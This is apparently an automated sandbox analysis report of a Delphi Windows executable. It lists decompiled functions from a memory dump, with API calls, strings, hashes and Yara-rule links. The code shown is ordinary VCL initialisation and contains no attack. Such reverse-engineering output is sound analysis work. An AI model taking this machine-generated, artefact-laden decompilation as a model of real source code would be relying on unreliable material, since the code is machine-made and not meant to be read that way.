String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
Instruction ID: a95c978ba0d7d151ab845f00ccb1e953877a4a526e1e70593208f9c5fde5a4dc
Opcode Fuzzy Hash: 40d43e4aa967ba0e44d00b39daf8816187a9c2091b90e9bc261389aedf9edc94
Instruction Fuzzy Hash: 6F318F71E0061C6AFB25D6B8DC46BDF6AAC8B04344F4401F7AA44F61C1E6789F848F94

Uniqueness

Uniqueness Score: -1.00%

Function 004547D0, Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004547D0(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00406D8C(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}

0x004547dc
0x004547e6
0x004547ef
0x004547f6
0x004547f9
0x004547fa
0x00454805
0x00454809

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004547FA

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 598302c28e7f559f112a55e5b7a9db3990e1a77f1ad0f75a23d62069af91447a
Instruction ID: 5803e6755cc40272ac919c0989782a04df59f5dce5c0c45c60d630398e48ec52
Opcode Fuzzy Hash: 598302c28e7f559f112a55e5b7a9db3990e1a77f1ad0f75a23d62069af91447a
Instruction Fuzzy Hash: 44F0C579215608AFCB40DF9DC588D4AFBE8BF4C260B058195BD88CB321C234FD808F94

Uniqueness

Uniqueness Score: -1.00%

Function 0045433C, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 130
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0045433C(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				intOrPtr* _t28;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				struct HINSTANCE__* _t36;
				void* _t38;
				CHAR* _t39;
				struct HWND__* _t40;
				char* _t46;
				char* _t51;
				long _t54;
				long _t58;
				struct HINSTANCE__* _t61;
				intOrPtr _t63;
				void* _t68;
				struct HMENU__* _t69;
				intOrPtr _t76;
				void* _t82;
				short _t87;

				_v48 = 0;
				_t68 = __eax;
				_push(_t82);
				_push(0x4544d3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x4544da);
					return E00404348( &_v48);
				}
				_t22 =  *0x491180; // 0x492048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E0041D1FC(E00454858, __eax); // executed
				 *(_t68 + 0x40) = _t23;
				_t25 =  *0x476c5c; // 0x454024
				_t26 =  *0x492714; // 0x400000
				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
					_t61 =  *0x492714; // 0x400000
					 *0x476c48 = _t61;
					_t87 = RegisterClassA(0x476c38);
					if(_t87 == 0) {
						_t63 =  *0x490f30; // 0x41d508
						E00406548(_t63,  &_v48);
						E0040A158(_v48, 1);
						E00403DA8();
					}
				}
				_t28 =  *0x490fe4; // 0x492a9c
				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_t32 =  *0x490fe4; // 0x492a9c
				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t35);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t36 =  *0x492714; // 0x400000
				_push(_t36);
				_push(0);
				_t7 = _t68 + 0x8c; // 0x297c0044
				_t38 = E004047F8( *_t7);
				_t39 =  *0x476c5c; // 0x454024, executed
				_t40 = E0040731C(_t39, 0x84ca0000, _t38); // executed
				 *(_t68 + 0x30) = _t40;
				_t9 = _t68 + 0x8c; // 0x44c534
				E00404348(_t9);
				 *((char*)(_t68 + 0xa4)) = 1;
				_t11 = _t68 + 0x40; // 0x10ac0000
				_t12 = _t68 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t46 =  *0x491050; // 0x492b70
				if( *_t46 != 0) {
					_t54 = E00454F30(_t68);
					_t13 = _t68 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t54); // executed
					_t58 = E00454F30(_t68);
					_t14 = _t68 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t58);
				}
				_t15 = _t68 + 0x30; // 0xe
				_t69 = GetSystemMenu( *_t15, 0);
				DeleteMenu(_t69, 0xf030, 0);
				DeleteMenu(_t69, 0xf000, 0);
				_t51 =  *0x491050; // 0x492b70
				if( *_t51 != 0) {
					DeleteMenu(_t69, 0xf010, 0);
				}
				goto L13;
			}

APIs

Part of subcall function 0041D1FC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D21A

GetClassInfoA.USER32 ref: 00454391
RegisterClassA.USER32 ref: 004543A9

Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579

SetWindowLongA.USER32 ref: 00454445
SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00454467
SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 0045447A
GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 00454485
DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 00454494
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 004544A1
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044C4A8), ref: 004544B8

Strings

H I, xrefs: 00454365
p+I, xrefs: 0045444A, 004544A6
$@E, xrefs: 00454385, 0045441C

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID: $@E$H I$p+I
API String ID: 2103932818-221982857
Opcode ID: 685e67a81e4949c604ffaa2b2dc12700fa6c6165387320308f4e2d3abc947387
Instruction ID: 7e8550c6c2abfd000bb9715b8e91fcd243a38e858309014aef8d95fae1ef381b
Opcode Fuzzy Hash: 685e67a81e4949c604ffaa2b2dc12700fa6c6165387320308f4e2d3abc947387
Instruction Fuzzy Hash: 94415F707402406FEB11EB69DC82F5A37E8AB55308F154076FE00EF2E7DAB8A844872C

Uniqueness

Uniqueness Score: -1.00%

Function 00440D14, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00440D14(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x440e8c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E00409348("Delphi%.8X", 0,  &_v16,  &_v8);
				E0040439C(0x492b7c, _v8);
				_t25 =  *0x492b7c; // 0x22108a8
				 *0x492b78 = GlobalAddAtomA(E004047F8(_t25));
				_t29 =  *0x492714; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E00409348("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E0040439C(0x492b80, _v20);
				_t35 =  *0x492b80; // 0x22108c4
				 *0x492b7a = GlobalAddAtomA(E004047F8(_t35));
				_t38 =  *0x492b80; // 0x22108c4
				 *0x492b84 = RegisterClipboardFormatA(E004047F8(_t38));
				 *0x492bbc = E004146F8(1);
				E00440918();
				 *0x492b6c = E00440740(1, 1);
				_t47 = E00452F50(1, __edi);
				_t78 =  *0x491278; // 0x492c08
				 *_t78 = _t47;
				_t49 = E00454034(0, 1);
				_t80 =  *0x49111c; // 0x492c04
				 *_t80 = _t49;
				_t50 =  *0x49111c; // 0x492c04
				E00455B40( *_t50, 1);
				_t53 =  *0x4307c4; // 0x4307c8
				E00413978(_t53, 0x432c88, 0x432c98);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x4768fc = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x440e93);
				E00404348( &_v20);
				return E00404348( &_v8);
			}

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00440E8C), ref: 00440D35
GlobalAddAtomA.KERNEL32 ref: 00440D68
GetCurrentThreadId.KERNEL32 ref: 00440D83
GlobalAddAtomA.KERNEL32 ref: 00440DB9
RegisterClipboardFormatA.USER32 ref: 00440DCF

Part of subcall function 004146F8: RtlInitializeCriticalSection.KERNEL32(00411A44,?,?,00440DE5,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00414717

Part of subcall function 00440918: SetErrorMode.KERNEL32(00008000), ref: 00440931
Part of subcall function 00440918: GetModuleHandleA.KERNEL32(USER32,00000000,00440A7E,?,00008000), ref: 00440955
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00440962
Part of subcall function 00440918: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00440A7E,?,00008000), ref: 0044097E
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 004409A0
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 004409B5
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 004409CA
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004409DF
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004409F4
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00440A09
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00440A1E
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00440A33
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00440A48
Part of subcall function 00440918: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440A5D
Part of subcall function 00440918: SetErrorMode.KERNEL32(?,00440A85,00008000), ref: 00440A78

Part of subcall function 00452F50: GetKeyboardLayout.USER32(00000000), ref: 00452F95
Part of subcall function 00452F50: GetDC.USER32(00000000), ref: 00452FEA
Part of subcall function 00452F50: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00452FF4
Part of subcall function 00452F50: ReleaseDC.USER32 ref: 00452FFF

Part of subcall function 00454034: LoadIconA.USER32(00400000,MAINICON), ref: 00454119
Part of subcall function 00454034: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045414B
Part of subcall function 00454034: OemToCharA.USER32(?,?), ref: 0045415E
Part of subcall function 00454034: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045419E

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00440E53
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440E64

Strings

AnimateWindow, xrefs: 00440E5E
Delphi%.8X, xrefs: 00440D46
USER32, xrefs: 00440E4E
ControlOfs%.8X%.8X, xrefs: 00440D97

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$CapsClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterReleaseSectionThread
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 2984857458-1126952177
Opcode ID: ae3d390876d2bc8afa20dae0fcc9a51e401959e281f9ddfb79b2c3f765abf0bd
Instruction ID: 356f96267dbb7d90c54aca1b36ca1d1b9089d299676edc16670ffe8150a110ea
Opcode Fuzzy Hash: ae3d390876d2bc8afa20dae0fcc9a51e401959e281f9ddfb79b2c3f765abf0bd
Instruction Fuzzy Hash: 8741A2B46002059FDB00FFB5DD92A9E77E5EB99308B11443BF504E73A2DB7869108B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00454034, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00454034(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403940(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E0041C178(_t91, 0);
				_t42 =  *0x491094; // 0x476468
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x491094; // 0x476468
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x455668;
				}
				_t43 =  *0x491138; // 0x476470
				_t109 =  *((short*)(_t43 + 2));
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x491138; // 0x476470
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E00455860;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E004035AC(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E004035AC(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E00425C10(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x490fc8; // 0x49202c
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E00425FE0(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x455dd0;
				_t60 =  *0x490fc8; // 0x49202c
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040ACC4(0x5c, _t109);
				_t110 = _t67;
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00408C10( &_v261, _t27);
				}
				_t69 = E0040ACEC( &_v261, 0x2e, _t110);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x44c534
				E004045B0(_t31, 0x100,  &_v261);
				_t75 =  *0x490ec0; // 0x492034
				if( *_t75 == 0) {
					E0045433C(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E00455FAC(_t90, 0x100);
				E004568EC(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403998(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

0x00454034
0x00454034
0x00454041
0x00454043
0x00454046
0x00454046
0x0045404b
0x0045404e
0x00454054
0x00454059
0x00454063
0x00454065
0x0045406a
0x0045406d
0x0045406d
0x00454073
0x00454078
0x0045407d
0x0045407f
0x00454084
0x00454087
0x00454087
0x0045408d
0x0045409d
0x004540af
0x004540b7
0x004540bc
0x004540c2
0x004540c9
0x004540d0
0x004540d6
0x004540dc
0x004540e3
0x004540ea
0x004540f1
0x00454104
0x00454106
0x00454111
0x00454119
0x00454122
0x00454127
0x00454127
0x0045412d
0x00454130
0x00454143
0x0045414b
0x0045415e
0x0045416b
0x00454170
0x00454172
0x00454174
0x0045417d
0x0045417d
0x0045418a
0x00454191
0x00454193
0x00454193
0x0045419e
0x004541a3
0x004541b4
0x004541b9
0x004541c1
0x004541c5
0x004541c5
0x004541ca
0x004541ce
0x004541d2
0x004541d6
0x004541df
0x004541e7
0x004541ee
0x004541f3
0x004541f9
0x004541fb
0x00454200
0x00454207
0x00454211

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 00454119
GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045414B
OemToCharA.USER32(?,?), ref: 0045415E
CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440E24,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 0045419E

Strings

, I, xrefs: 00454111, 00454143
4 I, xrefs: 004541B9
MAINICON, xrefs: 0045410C
$A, xrefs: 004540FA
hdG, xrefs: 00454059, 00454065
pdG, xrefs: 00454073, 0045407F

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: $A$, I$4 I$MAINICON$hdG$pdG
API String ID: 3935243913-1156448763
Opcode ID: 922a619da9b682197febd900e6eb4aca87468131e6d7f4f96febd67333188d54
Instruction ID: 492b8d1dde61073156ccc58a81f1fa8c89c0acc6cd51feea0c930f19b9c0e10a
Opcode Fuzzy Hash: 922a619da9b682197febd900e6eb4aca87468131e6d7f4f96febd67333188d54
Instruction Fuzzy Hash: D55160706042449FDB00DF39C885B857BE4AB15308F4480BAED48DF397D7BAD988CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00452F50, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00452F50(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr* _t48;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				char _t67;
				void* _t77;
				struct HDC__* _t78;
				void* _t79;
				void* _t80;

				_t77 = __edi;
				_t67 = __edx;
				if(__edx != 0) {
					_t80 = _t80 + 0xfffffff0;
					_t25 = E00403940(_t25, _t79);
				}
				_v5 = _t67;
				_t65 = _t25;
				E0041C178(_t66, 0);
				_t28 =  *0x490f64; // 0x476458
				 *((intOrPtr*)(_t28 + 4)) = _t65;
				 *_t28 = 0x4532f4;
				_t29 =  *0x490f70; // 0x476460
				 *((intOrPtr*)(_t29 + 4)) = _t65;
				 *_t29 = 0x453300;
				E0045330C(_t65);
				 *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t65 + 0x4c)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x50)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x54)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x58)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x7c)) = E004035AC(1);
				_t78 = GetDC(0);
				 *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a);
				ReleaseDC(0, _t78);
				_t11 = _t65 + 0x58; // 0x44c3d06e
				_t48 =  *0x4910a4; // 0x492ab8
				 *((intOrPtr*)( *_t48))(0, 0, E0044F7D4,  *_t11);
				 *((intOrPtr*)(_t65 + 0x84)) = E0041F22C(1);
				 *((intOrPtr*)(_t65 + 0x88)) = E0041F22C(1);
				 *((intOrPtr*)(_t65 + 0x80)) = E0041F22C(1);
				E0045372C(_t65, _t65, _t66, _t77);
				_t15 = _t65 + 0x84; // 0x38004010
				_t59 =  *_t15;
				 *((intOrPtr*)(_t59 + 0xc)) = _t65;
				 *((intOrPtr*)(_t59 + 8)) = 0x453608;
				_t18 = _t65 + 0x88; // 0x90000000
				_t60 =  *_t18;
				 *((intOrPtr*)(_t60 + 0xc)) = _t65;
				 *((intOrPtr*)(_t60 + 8)) = 0x453608;
				_t21 = _t65 + 0x80; // 0xac000000
				_t61 =  *_t21;
				 *((intOrPtr*)(_t61 + 0xc)) = _t65;
				 *((intOrPtr*)(_t61 + 8)) = 0x453608;
				_t62 = _t65;
				if(_v5 != 0) {
					E00403998(_t62);
					_pop( *[fs:0x0]);
				}
				return _t65;
			}

0x00452f50
0x00452f50
0x00452f58
0x00452f5a
0x00452f5d
0x00452f5d
0x00452f62
0x00452f65
0x00452f6b
0x00452f70
0x00452f75
0x00452f78
0x00452f7e
0x00452f83
0x00452f86
0x00452f8e
0x00452f9a
0x00452fa9
0x00452fb8
0x00452fc7
0x00452fd6
0x00452fe5
0x00452fef
0x00452ff9
0x00452fff
0x00453004
0x00453012
0x00453019
0x00453027
0x00453039
0x0045304b
0x00453053
0x00453058
0x00453058
0x0045305e
0x00453061
0x00453068
0x00453068
0x0045306e
0x00453071
0x00453078
0x00453078
0x0045307e
0x00453081
0x00453088
0x0045308e
0x00453090
0x00453095
0x0045309c
0x004530a5

APIs

GetKeyboardLayout.USER32(00000000), ref: 00452F95
GetDC.USER32(00000000), ref: 00452FEA
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00452FF4
ReleaseDC.USER32 ref: 00452FFF

Strings

XdG, xrefs: 00452F70
`dG, xrefs: 00452F7E

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceKeyboardLayoutRelease
String ID: XdG$`dG
API String ID: 3331096196-2051946594
Opcode ID: 2fd11fd8e630cee1da4b3216cba2d8a4f29a7d045d4c2127422d3f30164f92eb
Instruction ID: a1bd7cd623584787cd69cb3d3028c543d3de16661c23c3d8af0999e187b8e534
Opcode Fuzzy Hash: 2fd11fd8e630cee1da4b3216cba2d8a4f29a7d045d4c2127422d3f30164f92eb
Instruction Fuzzy Hash: 4B31FAB46516409FD740EF69DCC1B887BE4AB05359F0480BAE908DF367D77AA908CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0045372C, Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0045372C(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x492c04 != 0) {
					_t54 =  *0x492c04; // 0x2210d40
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x453871);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x492c04 != 0) {
					_t52 =  *0x492c04; // 0x2210d40
					E00455B40(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041F5BC( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041F5BC( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0xac000000
					E0041F6A0( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041F5BC( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0xac000000
					E0041F5BC( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041F5BC( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0xac000000
				E0041F400( *_t16, 0x80000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041F400( *_t17, 0x80000007);
				 *[fs:eax] = 0x80000007;
				_push(0x453878);
				if( *0x492c04 != 0) {
					_t38 =  *0x492c04; // 0x2210d40
					return E00455B40(_t38, _v5);
				}
				return 0;
			}

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00453780
CreateFontIndirectA.GDI32(?), ref: 0045378D
GetStockObject.GDI32(0000000D), ref: 004537A3

Part of subcall function 0041F6A0: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F6AD

SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004537CC
CreateFontIndirectA.GDI32(?), ref: 004537DC
CreateFontIndirectA.GDI32(?), ref: 004537F5
GetStockObject.GDI32(0000000D), ref: 0045381B

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

